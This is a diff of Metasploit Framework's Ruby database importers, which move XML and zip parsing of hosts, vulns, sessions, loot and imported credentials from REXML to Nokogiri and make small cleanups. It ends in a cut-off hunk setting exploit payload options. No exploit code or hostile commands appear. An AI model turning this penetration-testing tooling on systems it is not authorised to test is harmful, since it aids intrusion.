service_data[:proto] = nils_for_nulls(service.at("proto").text.to_s.strip)
|
||||
%W{created-at updated-at name state info}.each { |datum|
|
||||
if service.at(datum).text
|
||||
if datum == "info"
|
||||
service_data["info"] = nils_for_nulls(unserialize_object(service.at(datum), false))
|
||||
else
|
||||
service_data[datum.gsub("-","_")] = nils_for_nulls(service.at(datum).text.to_s.strip)
|
||||
end
|
||||
end
|
||||
}
|
||||
report_service(service_data)
|
||||
end
|
||||
|
||||
host.xpath('notes/note').each do |note|
|
||||
note_data = {}
|
||||
note_data[:workspace] = wspace
|
||||
note_data[:host] = hobj
|
||||
import_msf_note_element(note,allow_yaml,note_data)
|
||||
end
|
||||
|
||||
host.xpath('tags/tag').each do |tag|
|
||||
tag_data = {}
|
||||
tag_data[:addr] = host_address
|
||||
tag_data[:wspace] = wspace
|
||||
tag_data[:name] = tag.at("name").text.to_s.strip
|
||||
tag_data[:desc] = tag.at("desc").text.to_s.strip
|
||||
if tag.at("report-summary").text
|
||||
tag_data[:summary] = tag.at("report-summary").text.to_s.strip
|
||||
end
|
||||
if tag.at("report-detail").text
|
||||
tag_data[:detail] = tag.at("report-detail").text.to_s.strip
|
||||
end
|
||||
if tag.at("critical").text
|
||||
tag_data[:crit] = true unless tag.at("critical").text.to_s.strip == "NULL"
|
||||
end
|
||||
report_host_tag(tag_data)
|
||||
end
|
||||
|
||||
host.xpath('vulns/vuln').each do |vuln|
|
||||
vuln_data = {}
|
||||
vuln_data[:workspace] = wspace
|
||||
vuln_data[:host] = hobj
|
||||
vuln_data[:info] = nils_for_nulls(unserialize_object(vuln.at("info"), allow_yaml))
|
||||
vuln_data[:name] = nils_for_nulls(vuln.at("name").text.to_s.strip)
|
||||
%W{created-at updated-at exploited-at}.each { |datum|
|
||||
if vuln.at(datum) and vuln.at(datum).text
|
||||
vuln_data[datum.gsub("-","_")] = nils_for_nulls(vuln.at(datum).text.to_s.strip)
|
||||
end
|
||||
}
|
||||
if vuln.at("refs")
|
||||
vuln_data[:refs] = []
|
||||
vuln.xpath("refs/ref").each do |ref|
|
||||
vuln_data[:refs] << nils_for_nulls(ref.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
|
||||
vobj = report_vuln(vuln_data)
|
||||
|
||||
vuln.xpath("notes/note").each do |note|
|
||||
note_data = {}
|
||||
note_data[:workspace] = wspace
|
||||
note_data[:vuln_id] = vobj.id
|
||||
import_msf_note_element(note,allow_yaml,note_data)
|
||||
end
|
||||
|
||||
vuln.xpath("vuln_details/vuln_detail").each do |vdet|
|
||||
vdet_data = {}
|
||||
vdet.elements.each do |det|
|
||||
return 0 if ["id", "vuln-id"].include?(det.name)
|
||||
if det.text
|
||||
vdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_vuln_details(vobj, vdet_data)
|
||||
end
|
||||
|
||||
vuln.xpath("vuln_attempts/vuln_attempt").each do |vdet|
|
||||
vdet_data = {}
|
||||
vdet.elements.each do |det|
|
||||
return 0 if ["id", "vuln-id", "loot-id", "session-id"].include?(det.name)
|
||||
if det.text
|
||||
vdet_data[det.name.gsub('-','_')] = nils_for_nulls(det.text.to_s.strip)
|
||||
end
|
||||
end
|
||||
report_vuln_attempt(vobj, vdet_data)
|
||||
end
|
||||
end
|
||||
|
||||
## Handle old-style (pre 4.10) XML files
|
||||
if btag == "MetasploitV4"
|
||||
if host.at('creds').present?
|
||||
unless host.at('creds').elements.empty?
|
||||
origin = Metasploit::Credential::Origin::Import.create(filename: "console-import-#{Time.now.to_i}")
|
||||
|
||||
host.xpath('creds/cred').each do |cred|
|
||||
username = cred.at('user').try(:text)
|
||||
proto = cred.at('proto').try(:text)
|
||||
sname = cred.at('sname').try(:text)
|
||||
port = cred.at('port').try(:text)
|
||||
|
||||
# Handle blanks by resetting to sane default values
|
||||
proto = "tcp" if proto.blank?
|
||||
pass = cred.at('pass').try(:text)
|
||||
pass = "" if pass == "*MASKED*"
|
||||
|
||||
private = create_credential_private(private_data: pass, private_type: :password)
|
||||
public = create_credential_public(username: username)
|
||||
core = create_credential_core(private: private, public: public, origin: origin, workspace_id: wspace.id)
|
||||
|
||||
create_credential_login(core: core,
|
||||
workspace_id: wspace.id,
|
||||
address: hobj.address,
|
||||
port: port,
|
||||
protocol: proto,
|
||||
service_name: sname,
|
||||
status: Metasploit::Model::Login::Status::UNTRIED)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
host.xpath('sessions/session').each do |sess|
|
||||
sess_id = nils_for_nulls(sess.at("id").text.to_s.strip.to_i)
|
||||
sess_data = {}
|
||||
sess_data[:host] = hobj
|
||||
%W{desc platform port stype}.each {|datum|
|
||||
if sess.at(datum).respond_to? :text
|
||||
sess_data[datum.intern] = nils_for_nulls(sess.at(datum).text.to_s.strip)
|
||||
end
|
||||
}
|
||||
%W{opened-at close-reason closed-at via-exploit via-payload}.each {|datum|
|
||||
if sess.at(datum).respond_to? :text
|
||||
sess_data[datum.gsub("-","_").intern] = nils_for_nulls(sess.at(datum).text.to_s.strip)
|
||||
end
|
||||
}
|
||||
sess_data[:datastore] = nils_for_nulls(unserialize_object(sess.at("datastore"), allow_yaml))
|
||||
if sess.at("routes")
|
||||
sess_data[:routes] = nils_for_nulls(unserialize_object(sess.at("routes"), allow_yaml)) || []
|
||||
end
|
||||
if not sess_data[:closed_at] # Fake a close if we don't already have one
|
||||
sess_data[:closed_at] = Time.now.utc
|
||||
sess_data[:close_reason] = "Imported at #{Time.now.utc}"
|
||||
end
|
||||
|
||||
existing_session = get_session(
|
||||
:workspace => sess_data[:host].workspace,
|
||||
:addr => sess_data[:host].address,
|
||||
:time => sess_data[:opened_at]
|
||||
)
|
||||
this_session = existing_session || report_session(sess_data)
|
||||
return 0 if existing_session
|
||||
sess.xpath('events/event').each do |sess_event|
|
||||
sess_event_data = {}
|
||||
sess_event_data[:session] = this_session
|
||||
%W{created-at etype local-path remote-path}.each {|datum|
|
||||
if sess_event.at(datum).respond_to? :text
|
||||
sess_event_data[datum.gsub("-","_").intern] = nils_for_nulls(sess_event.at(datum).text.to_s.strip)
|
||||
end
|
||||
}
|
||||
%W{command output}.each {|datum|
|
||||
if sess_event.at(datum).respond_to? :text
|
||||
sess_event_data[datum.gsub("-","_").intern] = nils_for_nulls(unserialize_object(sess_event.at(datum), allow_yaml))
|
||||
end
|
||||
}
|
||||
report_session_event(sess_event_data)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Checks if the XML document has a format version that the importer
|
||||
# understands.
|
||||
#
|
||||
# @param document [REXML::Document] a REXML::Document produced by
|
||||
# {Msf::DBManager#rexmlify}.
|
||||
# @param name [String] the root node name produced by
|
||||
# {Nokogiri::XML::Reader#from_memory}.
|
||||
# @return [Hash{Symbol => Object}] `:allow_yaml` is true if the format
|
||||
# requires YAML loading when calling
|
||||
# {Msf::DBManager#unserialize_object}. `:root_tag` the tag name of the
|
||||
# root element for MSF XML.
|
||||
# @raise [Msf::DBImportError] if unsupported format
|
||||
def check_msf_xml_version!(document)
|
||||
def check_msf_xml_version!(name)
|
||||
|
||||
metadata = {
|
||||
# FIXME https://www.pivotaltracker.com/story/show/47128407
|
||||
:allow_yaml => false,
|
||||
:root_tag => nil
|
||||
}
|
||||
|
||||
if document.elements['MetasploitExpressV1']
|
||||
case name
|
||||
when 'MetasploitExpressV1'
|
||||
# FIXME https://www.pivotaltracker.com/story/show/47128407
|
||||
metadata[:allow_yaml] = true
|
||||
metadata[:root_tag] = 'MetasploitExpressV1'
|
||||
elsif document.elements['MetasploitExpressV2']
|
||||
when 'MetasploitExpressV2'
|
||||
# FIXME https://www.pivotaltracker.com/story/show/47128407
|
||||
metadata[:allow_yaml] = true
|
||||
metadata[:root_tag] = 'MetasploitExpressV2'
|
||||
elsif document.elements['MetasploitExpressV3']
|
||||
when 'MetasploitExpressV3'
|
||||
metadata[:root_tag] = 'MetasploitExpressV3'
|
||||
elsif document.elements['MetasploitExpressV4']
|
||||
when 'MetasploitExpressV4'
|
||||
metadata[:root_tag] = 'MetasploitExpressV4'
|
||||
elsif document.elements['MetasploitV4']
|
||||
when 'MetasploitV4'
|
||||
metadata[:root_tag] = 'MetasploitV4'
|
||||
elsif document.elements['MetasploitV5']
|
||||
when 'MetasploitV5'
|
||||
metadata[:root_tag] = 'MetasploitV5'
|
||||
end
|
||||
|
||||
|
@ -553,7 +564,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
|
||||
# Retrieves text of element if it exists.
|
||||
#
|
||||
# @param parent_element [REXML::Element] element under which element with
|
||||
# @param parent_element [Nokogiri::XML::Element] element under which element with
|
||||
# `child_name` exists.
|
||||
# @param child_name [String] the name of the element under
|
||||
# `parent_element` whose text should be returned
|
||||
|
@ -564,7 +575,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
# @return [nil] if element with `child_name` does not exist under
|
||||
# `parent_element`.
|
||||
def import_msf_text_element(parent_element, child_name)
|
||||
child_element = parent_element.elements[child_name]
|
||||
child_element = parent_element.at(child_name)
|
||||
info = {}
|
||||
|
||||
if child_element
|
||||
|
@ -577,10 +588,10 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
end
|
||||
|
||||
# Imports web_form, web_page, or web_vuln element using
|
||||
# {Msf::DBManager#report_web_form}, {Msf::DBManager#report_web_page}, and
|
||||
# {Msf::DBManager#report_web_vuln}, respectively.
|
||||
# Msf::DBManager#report_web_form, Msf::DBManager#report_web_page, and
|
||||
# Msf::DBManager#report_web_vuln, respectively.
|
||||
#
|
||||
# @param element [REXML::Element] the web_form, web_page, or web_vuln
|
||||
# @param element [Nokogiri::XML::Element] the web_form, web_page, or web_vuln
|
||||
# element.
|
||||
# @param options [Hash{Symbol => Object}] options
|
||||
# @option options [Boolean] :allow_yaml (false) Whether to allow YAML when
|
||||
|
@ -593,7 +604,7 @@ module Msf::DBManager::Import::MetasploitFramework::XML
|
|||
# (Msf::DBManager#workspace) workspace under which to report the
|
||||
# imported record.
|
||||
# @yield [element, options]
|
||||
# @yieldparam element [REXML::Element] the web_form, web_page, or
|
||||
# @yieldparam element [Nokogiri::XML::Element] the web_form, web_page, or
|
||||
# web_vuln element passed to {#import_msf_web_element}.
|
||||
# @yieldparam options [Hash{Symbol => Object}] options for parsing
|
||||
# @yieldreturn [Hash{Symbol => Object}] info
|
||||
|
|
|
@ -10,22 +10,23 @@ module Msf::DBManager::Import::MetasploitFramework::Zip
|
|||
allow_yaml = false
|
||||
btag = nil
|
||||
|
||||
doc = rexmlify(data)
|
||||
if doc.elements["MetasploitExpressV1"]
|
||||
doc = Nokogiri::XML::Reader.from_memory(data)
|
||||
case doc.first.name
|
||||
when "MetasploitExpressV1"
|
||||
m_ver = 1
|
||||
allow_yaml = true
|
||||
btag = "MetasploitExpressV1"
|
||||
elsif doc.elements["MetasploitExpressV2"]
|
||||
when "MetasploitExpressV2"
|
||||
m_ver = 2
|
||||
allow_yaml = true
|
||||
btag = "MetasploitExpressV2"
|
||||
elsif doc.elements["MetasploitExpressV3"]
|
||||
when "MetasploitExpressV3"
|
||||
m_ver = 3
|
||||
btag = "MetasploitExpressV3"
|
||||
elsif doc.elements["MetasploitExpressV4"]
|
||||
when "MetasploitExpressV4"
|
||||
m_ver = 4
|
||||
btag = "MetasploitExpressV4"
|
||||
elsif doc.elements["MetasploitV4"]
|
||||
when "MetasploitV4"
|
||||
m_ver = 4
|
||||
btag = "MetasploitV4"
|
||||
else
|
||||
|
@ -36,111 +37,121 @@ module Msf::DBManager::Import::MetasploitFramework::Zip
|
|||
end
|
||||
|
||||
host_info = {}
|
||||
doc.elements.each("/#{btag}/hosts/host") do |host|
|
||||
host_info[host.elements["id"].text.to_s.strip] = nils_for_nulls(host.elements["address"].text.to_s.strip)
|
||||
end
|
||||
|
||||
# Import Loot
|
||||
doc.elements.each("/#{btag}/loots/loot") do |loot|
|
||||
next if bl.include? host_info[loot.elements["host-id"].text.to_s.strip]
|
||||
loot_info = {}
|
||||
loot_info[:host] = host_info[loot.elements["host-id"].text.to_s.strip]
|
||||
loot_info[:workspace] = args[:wspace]
|
||||
loot_info[:ctype] = nils_for_nulls(loot.elements["content-type"].text.to_s.strip)
|
||||
loot_info[:info] = nils_for_nulls(unserialize_object(loot.elements["info"], allow_yaml))
|
||||
loot_info[:ltype] = nils_for_nulls(loot.elements["ltype"].text.to_s.strip)
|
||||
loot_info[:name] = nils_for_nulls(loot.elements["name"].text.to_s.strip)
|
||||
loot_info[:created_at] = nils_for_nulls(loot.elements["created-at"].text.to_s.strip)
|
||||
loot_info[:updated_at] = nils_for_nulls(loot.elements["updated-at"].text.to_s.strip)
|
||||
loot_info[:name] = nils_for_nulls(loot.elements["name"].text.to_s.strip)
|
||||
loot_info[:orig_path] = nils_for_nulls(loot.elements["path"].text.to_s.strip)
|
||||
loot_info[:task] = args[:task]
|
||||
tmp = args[:ifd][:zip_tmp]
|
||||
loot_info[:orig_path].gsub!(/^\./,tmp) if loot_info[:orig_path]
|
||||
if !loot.elements["service-id"].text.to_s.strip.empty?
|
||||
unless loot.elements["service-id"].text.to_s.strip == "NULL"
|
||||
loot_info[:service] = loot.elements["service-id"].text.to_s.strip
|
||||
doc.each do |node|
|
||||
if ['host', 'loot', 'task', 'report'].include?(node.name)
|
||||
unless node.inner_xml.empty?
|
||||
send("parse_zip_#{node.name}", Nokogiri::XML(node.outer_xml).at("./#{node.name}"), wspace, bl, allow_yaml, btag, args, basedir, host_info, &block)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# Only report loot if we actually have it.
|
||||
# TODO: Copypasta. Separate this out.
|
||||
if ::File.exists? loot_info[:orig_path]
|
||||
loot_dir = ::File.join(basedir,"loot")
|
||||
loot_file = ::File.split(loot_info[:orig_path]).last
|
||||
if ::File.exists? loot_dir
|
||||
unless (::File.directory?(loot_dir) && ::File.writable?(loot_dir))
|
||||
raise Msf::DBImportError.new("Could not move files to #{loot_dir}")
|
||||
end
|
||||
else
|
||||
::FileUtils.mkdir_p(loot_dir)
|
||||
end
|
||||
new_loot = ::File.join(loot_dir,loot_file)
|
||||
loot_info[:path] = new_loot
|
||||
if ::File.exists?(new_loot)
|
||||
::File.unlink new_loot # Delete it, and don't report it.
|
||||
else
|
||||
report_loot(loot_info) # It's new, so report it.
|
||||
end
|
||||
::FileUtils.copy(loot_info[:orig_path], new_loot)
|
||||
yield(:msf_loot, new_loot) if block
|
||||
# Parses host Nokogiri::XML::Element
|
||||
def parse_zip_host(host, wspace, bl, allow_yaml, btag, args, basedir, host_info, &block)
|
||||
host_info[host.at("id").text.to_s.strip] = nils_for_nulls(host.at("address").text.to_s.strip) unless host.at('address').nil?
|
||||
end
|
||||
|
||||
# Parses loot Nokogiri::XML::Element
|
||||
def parse_zip_loot(loot, wspace, bl, allow_yaml, btag, args, basedir, host_info, &block)
|
||||
return 0 if bl.include? host_info[loot.at("host-id").text.to_s.strip]
|
||||
loot_info = {}
|
||||
loot_info[:host] = host_info[loot.at("host-id").text.to_s.strip]
|
||||
loot_info[:workspace] = args[:wspace]
|
||||
loot_info[:ctype] = nils_for_nulls(loot.at("content-type").text.to_s.strip)
|
||||
loot_info[:info] = nils_for_nulls(unserialize_object(loot.at("info"), allow_yaml))
|
||||
loot_info[:ltype] = nils_for_nulls(loot.at("ltype").text.to_s.strip)
|
||||
loot_info[:name] = nils_for_nulls(loot.at("name").text.to_s.strip)
|
||||
loot_info[:created_at] = nils_for_nulls(loot.at("created-at").text.to_s.strip)
|
||||
loot_info[:updated_at] = nils_for_nulls(loot.at("updated-at").text.to_s.strip)
|
||||
loot_info[:name] = nils_for_nulls(loot.at("name").text.to_s.strip)
|
||||
loot_info[:orig_path] = nils_for_nulls(loot.at("path").text.to_s.strip)
|
||||
loot_info[:task] = args[:task]
|
||||
tmp = args[:ifd][:zip_tmp]
|
||||
loot_info[:orig_path].gsub!(/^\./,tmp) if loot_info[:orig_path]
|
||||
if !loot.at("service-id").text.to_s.strip.empty?
|
||||
unless loot.at("service-id").text.to_s.strip == "NULL"
|
||||
loot_info[:service] = loot.at("service-id").text.to_s.strip
|
||||
end
|
||||
end
|
||||
|
||||
# Import Tasks
|
||||
doc.elements.each("/#{btag}/tasks/task") do |task|
|
||||
task_info = {}
|
||||
task_info[:workspace] = args[:wspace]
|
||||
# Should user be imported (original) or declared (the importing user)?
|
||||
task_info[:user] = nils_for_nulls(task.elements["created-by"].text.to_s.strip)
|
||||
task_info[:desc] = nils_for_nulls(task.elements["description"].text.to_s.strip)
|
||||
task_info[:info] = nils_for_nulls(unserialize_object(task.elements["info"], allow_yaml))
|
||||
task_info[:mod] = nils_for_nulls(task.elements["module"].text.to_s.strip)
|
||||
task_info[:options] = nils_for_nulls(task.elements["options"].text.to_s.strip)
|
||||
task_info[:prog] = nils_for_nulls(task.elements["progress"].text.to_s.strip).to_i
|
||||
task_info[:created_at] = nils_for_nulls(task.elements["created-at"].text.to_s.strip)
|
||||
task_info[:updated_at] = nils_for_nulls(task.elements["updated-at"].text.to_s.strip)
|
||||
if !task.elements["completed-at"].text.to_s.empty?
|
||||
task_info[:completed_at] = nils_for_nulls(task.elements["completed-at"].text.to_s.strip)
|
||||
end
|
||||
if !task.elements["error"].text.to_s.empty?
|
||||
task_info[:error] = nils_for_nulls(task.elements["error"].text.to_s.strip)
|
||||
end
|
||||
if !task.elements["result"].text.to_s.empty?
|
||||
task_info[:result] = nils_for_nulls(task.elements["result"].text.to_s.strip)
|
||||
end
|
||||
task_info[:orig_path] = nils_for_nulls(task.elements["path"].text.to_s.strip)
|
||||
tmp = args[:ifd][:zip_tmp]
|
||||
task_info[:orig_path].gsub!(/^\./,tmp) if task_info[:orig_path]
|
||||
|
||||
# Only report a task if we actually have it.
|
||||
# TODO: Copypasta. Separate this out.
|
||||
if ::File.exists? task_info[:orig_path]
|
||||
tasks_dir = ::File.join(basedir,"tasks")
|
||||
task_file = ::File.split(task_info[:orig_path]).last
|
||||
if ::File.exists? tasks_dir
|
||||
unless (::File.directory?(tasks_dir) && ::File.writable?(tasks_dir))
|
||||
raise Msf::DBImportError.new("Could not move files to #{tasks_dir}")
|
||||
end
|
||||
else
|
||||
::FileUtils.mkdir_p(tasks_dir)
|
||||
# Only report loot if we actually have it.
|
||||
# TODO: Copypasta. Separate this out.
|
||||
if ::File.exist? loot_info[:orig_path]
|
||||
loot_dir = ::File.join(basedir,"loot")
|
||||
loot_file = ::File.split(loot_info[:orig_path]).last
|
||||
if ::File.exist? loot_dir
|
||||
unless (::File.directory?(loot_dir) && ::File.writable?(loot_dir))
|
||||
raise Msf::DBImportError.new("Could not move files to #{loot_dir}")
|
||||
end
|
||||
new_task = ::File.join(tasks_dir,task_file)
|
||||
task_info[:path] = new_task
|
||||
if ::File.exists?(new_task)
|
||||
::File.unlink new_task # Delete it, and don't report it.
|
||||
else
|
||||
report_task(task_info) # It's new, so report it.
|
||||
end
|
||||
::FileUtils.copy(task_info[:orig_path], new_task)
|
||||
yield(:msf_task, new_task) if block
|
||||
else
|
||||
::FileUtils.mkdir_p(loot_dir)
|
||||
end
|
||||
new_loot = ::File.join(loot_dir,loot_file)
|
||||
loot_info[:path] = new_loot
|
||||
if ::File.exist?(new_loot)
|
||||
::File.unlink new_loot # Delete it, and don't report it.
|
||||
else
|
||||
report_loot(loot_info) # It's new, so report it.
|
||||
end
|
||||
::FileUtils.copy(loot_info[:orig_path], new_loot)
|
||||
yield(:msf_loot, new_loot) if block
|
||||
end
|
||||
end
|
||||
|
||||
# Import Reports
|
||||
doc.elements.each("/#{btag}/reports/report") do |report|
|
||||
import_report(report, args, basedir)
|
||||
# Parses task Nokogiri::XML::Element
|
||||
def parse_zip_task(task, wspace, bl, allow_yaml, btag, args, basedir, host_info, &block)
|
||||
task_info = {}
|
||||
task_info[:workspace] = args[:wspace]
|
||||
# Should user be imported (original) or declared (the importing user)?
|
||||
task_info[:user] = nils_for_nulls(task.at("created-by").text.to_s.strip)
|
||||
task_info[:desc] = nils_for_nulls(task.at("description").text.to_s.strip)
|
||||
task_info[:info] = nils_for_nulls(unserialize_object(task.at("info"), allow_yaml))
|
||||
task_info[:mod] = nils_for_nulls(task.at("module").text.to_s.strip)
|
||||
task_info[:options] = nils_for_nulls(task.at("options").text.to_s.strip)
|
||||
task_info[:prog] = nils_for_nulls(task.at("progress").text.to_s.strip).to_i
|
||||
task_info[:created_at] = nils_for_nulls(task.at("created-at").text.to_s.strip)
|
||||
task_info[:updated_at] = nils_for_nulls(task.at("updated-at").text.to_s.strip)
|
||||
if !task.at("completed-at").text.to_s.empty?
|
||||
task_info[:completed_at] = nils_for_nulls(task.at("completed-at").text.to_s.strip)
|
||||
end
|
||||
if !task.at("error").text.to_s.empty?
|
||||
task_info[:error] = nils_for_nulls(task.at("error").text.to_s.strip)
|
||||
end
|
||||
if !task.at("result").text.to_s.empty?
|
||||
task_info[:result] = nils_for_nulls(task.at("result").text.to_s.strip)
|
||||
end
|
||||
task_info[:orig_path] = nils_for_nulls(task.at("path").text.to_s.strip)
|
||||
tmp = args[:ifd][:zip_tmp]
|
||||
task_info[:orig_path].gsub!(/^\./,tmp) if task_info[:orig_path]
|
||||
|
||||
# Only report a task if we actually have it.
|
||||
# TODO: Copypasta. Separate this out.
|
||||
if ::File.exist? task_info[:orig_path]
|
||||
tasks_dir = ::File.join(basedir,"tasks")
|
||||
task_file = ::File.split(task_info[:orig_path]).last
|
||||
if ::File.exist? tasks_dir
|
||||
unless (::File.directory?(tasks_dir) && ::File.writable?(tasks_dir))
|
||||
raise Msf::DBImportError.new("Could not move files to #{tasks_dir}")
|
||||
end
|
||||
else
|
||||
::FileUtils.mkdir_p(tasks_dir)
|
||||
end
|
||||
new_task = ::File.join(tasks_dir,task_file)
|
||||
task_info[:path] = new_task
|
||||
if ::File.exist?(new_task)
|
||||
::File.unlink new_task # Delete it, and don't report it.
|
||||
else
|
||||
report_task(task_info) # It's new, so report it.
|
||||
end
|
||||
::FileUtils.copy(task_info[:orig_path], new_task)
|
||||
yield(:msf_task, new_task) if block
|
||||
end
|
||||
end
|
||||
|
||||
# Parses report Nokogiri::XML::Element
|
||||
def parse_zip_report(report, wspace, bl, allow_yaml, btag, args, basedir, host_info, &block)
|
||||
import_report(report, args, basedir)
|
||||
end
|
||||
|
||||
# Import a Metasploit Express ZIP file. Note that this requires
|
||||
|
@ -156,7 +167,7 @@ module Msf::DBManager::Import::MetasploitFramework::Zip
|
|||
bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
|
||||
|
||||
new_tmp = ::File.join(Dir::tmpdir,"msf","imp_#{Rex::Text::rand_text_alphanumeric(4)}",@import_filedata[:zip_basename])
|
||||
if ::File.exists? new_tmp
|
||||
if ::File.exist? new_tmp
|
||||
unless (::File.directory?(new_tmp) && ::File.writable?(new_tmp))
|
||||
raise Msf::DBImportError.new("Could not extract zip file to #{new_tmp}")
|
||||
end
|
||||
|
@ -172,7 +183,7 @@ module Msf::DBManager::Import::MetasploitFramework::Zip
|
|||
# already exist
|
||||
@import_filedata[:zip_tmp_subdirs].each {|sub|
|
||||
tmp_subdirs = ::File.join(@import_filedata[:zip_tmp],sub)
|
||||
if File.exists? tmp_subdirs
|
||||
if File.exist? tmp_subdirs
|
||||
unless (::File.directory?(tmp_subdirs) && File.writable?(tmp_subdirs))
|
||||
# if it exists but we can't write to it, give up
|
||||
raise Msf::DBImportError.new("Could not extract zip file to #{tmp_subdirs}")
|
||||
|
@ -198,7 +209,7 @@ module Msf::DBManager::Import::MetasploitFramework::Zip
|
|||
Dir.entries(@import_filedata[:zip_tmp]).each do |entry|
|
||||
if entry =~ /^.*#{Regexp.quote(Metasploit::Credential::Exporter::Core::CREDS_DUMP_FILE_IDENTIFIER)}.*/
|
||||
manifest_file_path = File.join(@import_filedata[:zip_tmp], entry, Metasploit::Credential::Importer::Zip::MANIFEST_FILE_NAME)
|
||||
if File.exists? manifest_file_path
|
||||
if File.exist? manifest_file_path
|
||||
import_msf_cred_dump(manifest_file_path, wspace)
|
||||
end
|
||||
end
|
||||
|
|
|
@ -196,8 +196,8 @@ module Msf::DBManager::Import::Nexpose::Raw
|
|||
# Takes an array of vuln hashes, as returned by the NeXpose rawxml stream
|
||||
# parser, like:
|
||||
# [
|
||||
# {"id"=>"winreg-notes-protocol-handler", severity="8", "refs"=>[{"source"=>"BID", "value"=>"10600"}, ...]}
|
||||
# {"id"=>"windows-zotob-c", severity="8", "refs"=>[{"source"=>"BID", "value"=>"14513"}, ...]}
|
||||
# "id"=>"winreg-notes-protocol-handler", severity="8", "refs"=>["source"=>"BID", "value"=>"10600", ...]
|
||||
# "id"=>"windows-zotob-c", severity="8", "refs"=>["source"=>"BID", "value"=>"14513", ...]
|
||||
# ]
|
||||
# and transforms it into a struct, containing :id, :refs, :title, and :severity
|
||||
#
|
||||
|
@ -227,4 +227,4 @@ module Msf::DBManager::Import::Nexpose::Raw
|
|||
end
|
||||
return ret
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -28,7 +28,7 @@ module Msf::DBManager::Import::Report
|
|||
report_id = report_report(report_info)
|
||||
|
||||
# Handle artifacts
|
||||
report.elements['artifacts'].elements.each do |artifact|
|
||||
report.elements.at('artifacts').elements.each do |artifact|
|
||||
artifact_opts = {}
|
||||
artifact.elements.each do |attr|
|
||||
skip_nodes = %w|id accessed-at|
|
||||
|
|
|
@ -329,7 +329,7 @@ module Msf::DBManager::ModuleCache
|
|||
next
|
||||
end
|
||||
|
||||
unless md.file and ::File.exists?(md.file)
|
||||
unless md.file and ::File.exist?(md.file)
|
||||
refresh << md
|
||||
next
|
||||
end
|
||||
|
|
|
@ -23,7 +23,7 @@ module Msf::DBManager::Report
|
|||
created = opts.delete(:created_at)
|
||||
updated = opts.delete(:updated_at)
|
||||
|
||||
unless File.exists? tmp_path
|
||||
unless File.exist? tmp_path
|
||||
raise Msf::DBImportError 'Report artifact file to be imported does not exist.'
|
||||
end
|
||||
|
||||
|
@ -31,7 +31,7 @@ module Msf::DBManager::Report
|
|||
raise Msf::DBImportError "Could not move report artifact file to #{artifacts_dir}."
|
||||
end
|
||||
|
||||
if File.exists? new_path
|
||||
if File.exist? new_path
|
||||
unique_basename = "#{(Time.now.to_f*1000).to_i}_#{artifact_name}"
|
||||
new_path = File.join(artifacts_dir, unique_basename)
|
||||
end
|
||||
|
|
|
@ -33,7 +33,7 @@ module Msf::DBManager::Session
|
|||
# :session host is contained. Also used as the workspace for the
|
||||
# Mdm::ExploitAttempt and Mdm::Vuln. Defaults to Mdm::Worksapce with
|
||||
# Mdm::Workspace#name equal to +session.workspace+.
|
||||
# @return [nil] if {Msf::DBManager#active} is +false+.
|
||||
# @return [nil] if Msf::DBManager#active is +false+.
|
||||
# @return [Mdm::Session] if session is saved
|
||||
# @raise [ArgumentError] if :session is not an {Msf::Session}.
|
||||
# @raise [ActiveRecord::RecordInvalid] if session is invalid and cannot be
|
||||
|
@ -68,7 +68,7 @@ module Msf::DBManager::Session
|
|||
# exploit that was used to open the session.
|
||||
# @option option [String] :via_payload the {MSf::Module#fullname} of the
|
||||
# payload sent to the host when the exploit was successful.
|
||||
# @return [nil] if {Msf::DBManager#active} is +false+.
|
||||
# @return [nil] if Msf::DBManager#active is +false+.
|
||||
# @return [Mdm::Session] if session is saved.
|
||||
# @raise [ArgumentError] if :host is not an Mdm::Host.
|
||||
# @raise [ActiveRecord::RecordInvalid] if session is invalid and cannot be
|
||||
|
@ -103,7 +103,7 @@ module Msf::DBManager::Session
|
|||
|
||||
protected
|
||||
|
||||
# @param session [Msf::Session] A session with a {db_record Msf::Session#db_record}
|
||||
# @param session [Msf::Session] A session with a db_record Msf::Session#db_record
|
||||
# @param wspace [Mdm::Workspace]
|
||||
# @return [void]
|
||||
def infer_vuln_from_session(session, wspace)
|
||||
|
@ -172,7 +172,7 @@ module Msf::DBManager::Session
|
|||
host = find_or_create_host(h_opts)
|
||||
sess_data = {
|
||||
datastore: session.exploit_datastore.to_h,
|
||||
desc: truncate_session_desc(session.info),
|
||||
desc: session.info,
|
||||
host_id: host.id,
|
||||
last_seen: Time.now.utc,
|
||||
local_id: session.sid,
|
||||
|
@ -212,7 +212,7 @@ module Msf::DBManager::Session
|
|||
sess_data = {
|
||||
host_id: host.id,
|
||||
stype: opts[:stype],
|
||||
desc: truncate_session_desc(opts[:desc]),
|
||||
desc: opts[:desc],
|
||||
platform: opts[:platform],
|
||||
via_payload: opts[:via_payload],
|
||||
via_exploit: opts[:via_exploit],
|
||||
|
@ -230,16 +230,4 @@ module Msf::DBManager::Session
|
|||
}
|
||||
end
|
||||
|
||||
# Truncate the session data if necessary
|
||||
#
|
||||
# @param desc [String]
|
||||
# @return [String] +desc+ truncated to the max length of the desc column
|
||||
def truncate_session_desc(desc)
|
||||
# Truncate the session data if necessary
|
||||
if desc
|
||||
desc = desc[0, ::Mdm::Session.columns_hash['desc'].limit]
|
||||
end
|
||||
desc
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -537,7 +537,7 @@ protected
|
|||
#
|
||||
def find_context_key(buf, badchars, state)
|
||||
# Make sure our context information file is sane
|
||||
if !File.exists?(datastore['ContextInformationFile'])
|
||||
if !File.exist?(datastore['ContextInformationFile'])
|
||||
raise NoKeyError, "A context information file must specified when using context encoding", caller
|
||||
end
|
||||
|
||||
|
|
|
@ -130,16 +130,12 @@ module Msf
|
|||
xploit.datastore['PAYLOAD'] = p.first[:payload_name]
|
||||
xploit.datastore['LPORT'] = p.first[:payload_lport]
|
||||
xploit.datastore['SRVHOST'] = datastore['SRVHOST']
|
||||
